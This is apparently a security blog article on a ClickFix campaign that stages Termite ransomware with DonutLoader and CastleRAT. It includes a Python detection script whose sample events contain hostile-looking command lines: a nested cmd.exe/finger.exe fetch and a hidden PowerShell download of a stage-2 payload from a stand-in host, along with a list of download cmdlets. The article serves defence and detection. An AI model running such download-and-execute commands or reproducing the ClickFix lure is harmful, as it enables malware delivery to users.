Ransomware attacks rarely rely on a single tool or exploit anymore. Instead, modern cybercriminal operations combine social engineering, built-in Windows utilities, and multi-stage malware loaders to quietly establish persistence inside networks.
A recent investigation highlighted how threat actors are leveraging the ClickFix technique alongside CastleRAT and DonutLoader to prepare environments for Termite ransomware attacks. The activity has been linked to a threat actor cluster known as Velvet Tempest, which has historical ties to major ransomware families.
This campaign demonstrates how attackers are shifting from noisy exploit-based intrusions to living-off-the-land attacks that blend malicious behavior with legitimate system tools.
In this article, we’ll break down the attack chain, techniques used, and key defensive lessons for security teams.
The Threat Actor: Velvet Tempest
The activity has been attributed to a threat actor tracked as Velvet Tempest, also known as DEV-0504. This group is believed to have links to several well-known ransomware ecosystems including Ryuk, REvil, Conti, and BlackCat.
Researchers observed the attackers operating inside a simulated enterprise environment for 12 days, allowing analysts to capture the full progression of the intrusion — from initial access to pre-ransomware reconnaissance.
Instead of deploying ransomware immediately, the attackers spent time performing:
- Credential harvesting
- Active Directory enumeration
- Environment profiling
- Lateral movement preparation
These steps indicate a deliberate pre-ransomware staging phase.
Initial Access: The ClickFix Social Engineering Technique
At the entry point of the attack is a clever social engineering trick known as ClickFix.
ClickFix campaigns typically present victims with a fake problem prompt, such as:
- A CAPTCHA verification failure
- Browser security warning
- System troubleshooting message
The page then instructs the user to copy and paste a command into the Windows Run dialog as a supposed fix.
In reality, the copied command triggers a malicious chain that downloads additional payloads.
This approach is effective because:
- It bypasses many security prompts
- The user performs the action themselves
- It avoids exploit-based detection
Essentially, the victim unknowingly executes the malware delivery command.
Malware Delivery Chain
Once the command is executed, the attackers deploy a multi-stage malware chain designed to establish persistence.
Stage 1: Command Execution
The command triggers nested cmd.exe execution chains that leverage legitimate Windows utilities.
In some observed cases, the attackers used finger.exe, a rarely used Windows utility, to download the initial payload.
Using such tools helps attackers remain stealthy.
Stage 2: DonutLoader
Next, the attackers deploy DonutLoader, a malware loader designed to execute payloads directly in memory.
Key features include:
- In-memory execution
- Obfuscation capabilities
- Delivery of additional malware components
The loader prepares the system for the next stage of the attack.
Stage 3: CastleRAT Backdoor
After DonutLoader executes, it installs CastleRAT, a remote access trojan.
CastleRAT enables attackers to:
- Maintain persistent remote access
- Execute commands
- Deploy additional payloads
- Download information stealers
The RAT can also deploy tools like LummaStealer and other post-exploitation utilities.
At this stage, the attacker effectively controls the compromised system.
Pre-Ransomware Reconnaissance
Interestingly, during the monitored intrusion, researchers did not observe the deployment of Termite ransomware itself.
However, the attackers performed several actions typically associated with ransomware preparation:
- Active Directory discovery
- Credential harvesting via PowerShell scripts
- Drive enumeration
- Network mapping
These activities strongly indicate preparation for a future ransomware deployment phase.
Why This Attack Is Difficult to Detect
One of the most concerning aspects of this campaign is how it blends malicious activity with legitimate system behavior.
The attackers relied heavily on:
- PowerShell
- Windows command utilities
- Legitimate binaries
- Memory-resident malware
Security tools often struggle to detect such attacks because the actions look similar to normal administrative activity.
This tactic is commonly referred to as Living off the Land (LotL).
Key Indicators of Compromise
Security teams should watch for indicators such as:
Suspicious behaviors
- Users executing unexpected commands in Windows Run
- PowerShell scripts retrieving external payloads
- Unusual usage of finger.exe or other rarely used utilities
Post-exploitation activity
- Active Directory enumeration
- Credential dumping
- Network drive scanning
Monitoring behavioral anomalies is often more effective than relying solely on malware signatures.
Defensive Strategies for Organizations
Organizations can reduce risk from these attacks through several defensive measures.
1. Limit Script Execution
Restrict PowerShell usage with:
- Constrained Language Mode
- Script block logging
- PowerShell execution policies
2. Monitor Living-off-the-Land Binaries
Track abnormal usage of tools such as:
- cmd.exe
- powershell.exe
- finger.exe
These utilities are frequently abused in modern attacks.
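The indicators listed above (Run dialog launches, PowerShell retrieving external payloads, finger.exe use) and the binaries named here can be turned into concrete detection logic over process-creation telemetry. The following is an added example written for this article, not tooling from the original investigation: it runs four behavioural rules over constructed Sysmon-style Event ID 1 records (the field names Image, CommandLine, ParentImage, ProcessGuid and ParentProcessGuid are Sysmon's; every GUID, host and command line is a constructed sample). The rare-utility list holds only finger.exe because that is the utility the article names; in practice it is seeded from the environment's own baseline.

```python
"""Behavioural detection over constructed Sysmon-style process-creation events.
Example code added for this article; not from the original investigation.
All GUIDs, hosts, paths and command lines below are constructed samples."""
import re

# g1 is a benign desktop session; g2-g5 model the chain the article describes
# (Run dialog -> nested cmd.exe -> finger.exe -> PowerShell download);
# g6-g8 are benign shells that a naive parent/child rule would misfire on.
SAMPLE_EVENTS = [
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c cmd.exe /c finger.exe fix@example.invalid"},
    {"ProcessGuid": "g3", "ParentProcessGuid": "g2", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c finger.exe fix@example.invalid"},
    {"ProcessGuid": "g4", "ParentProcessGuid": "g3", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\finger.exe", "CommandLine": "finger.exe fix@example.invalid"},
    {"ProcessGuid": "g5", "ParentProcessGuid": "g3", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "Invoke-WebRequest https://example.invalid/stage2 -OutFile $env:TEMP\\s2.bin"'},
    # Benign: console opened from the Start menu (explorer.exe parent, no arguments).
    {"ProcessGuid": "g6", "ParentProcessGuid": "g1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    # Benign: scheduled task running a batch file (a single cmd.exe, no nesting).
    {"ProcessGuid": "g7", "ParentProcessGuid": "g0", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c C:\Scripts\nightly-backup.bat"},
    # Benign: an editor's integrated terminal, no download cmdlets on the command line.
    {"ProcessGuid": "g8", "ParentProcessGuid": "g0", "ParentImage": r"C:\Program Files\Editor\editor.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoLogo -NoExit -Command Set-Location C:\\src"},
]

RARE_UTILITIES = {"finger.exe"}  # the utility the article names; extend from your own baseline
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Common PowerShell ways of pulling content from a remote host.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)\b",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def has_arguments(cmdline):
    """True when anything follows the executable token (quoted or bare)."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.DOTALL)
    return bool(m and m.group(1).strip())


def cmd_chain_depth(event, by_guid):
    """Consecutive cmd.exe processes from this event up through its parents."""
    depth, cur = 0, event
    while cur is not None and basename(cur["Image"]) == "cmd.exe":
        depth += 1
        cur = by_guid.get(cur["ParentProcessGuid"])
    return depth


def detect(events):
    """Return one finding per (rule, process) pair that matches."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []

    def flag(rule, e):
        findings.append({"rule": rule, "ProcessGuid": e["ProcessGuid"], "CommandLine": e["CommandLine"]})

    for e in events:
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        if image in RARE_UTILITIES:
            flag("rare_lolbin_execution", e)
        # The Run dialog is hosted by explorer.exe, but so is the Start menu; a console
        # opened from the Start menu carries no arguments, so require some to cut noise.
        if parent == "explorer.exe" and image in INTERACTIVE_SHELLS and has_arguments(e["CommandLine"]):
            flag("run_dialog_shell_launch", e)
        if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CMDLETS.search(e["CommandLine"]):
            flag("powershell_remote_download", e)
        # Nested cmd.exe chains: walk the parent pointers rather than parsing /c text.
        if image == "cmd.exe" and cmd_chain_depth(e, by_guid) >= 2:
            flag("nested_cmd_chain", e)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f'{f["rule"]:28} {f["ProcessGuid"]}  {f["CommandLine"]}')
```

Run against the samples, the four chain events g2 through g5 each raise exactly one rule while the three benign shells raise none. Rules deliberately key on parent/child structure and argument shape rather than on a hash or file name, which is the point the article makes about behavioural monitoring: the same logic fires on a renamed loader or a changed download host as long as the chain shape survives.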
3. Deploy Behavioral Detection
Security teams should rely on:
- EDR platforms
- Anomaly-based monitoring
- Threat hunting
Traditional signature-based detection is insufficient for these attacks.
4. Security Awareness Training
Because ClickFix relies on user interaction, awareness training is critical.
Employees should be warned never to:
- Paste commands from websites
- Execute troubleshooting commands they do not understand
Final Thoughts
The ClickFix campaign highlights an evolving ransomware ecosystem where attackers increasingly rely on stealth, deception, and legitimate tools instead of obvious malware exploits.
Rather than launching ransomware immediately, threat actors first establish long-term access, collect credentials, and map the environment. Only after they fully understand the network do they deploy the final payload.
The combination of ClickFix, DonutLoader, and CastleRAT shows how modern attacks are becoming modular, flexible, and harder to detect.
For defenders, the lesson is clear:
The future of ransomware defense lies not just in malware detection — but in behavioral monitoring and proactive threat hunting.
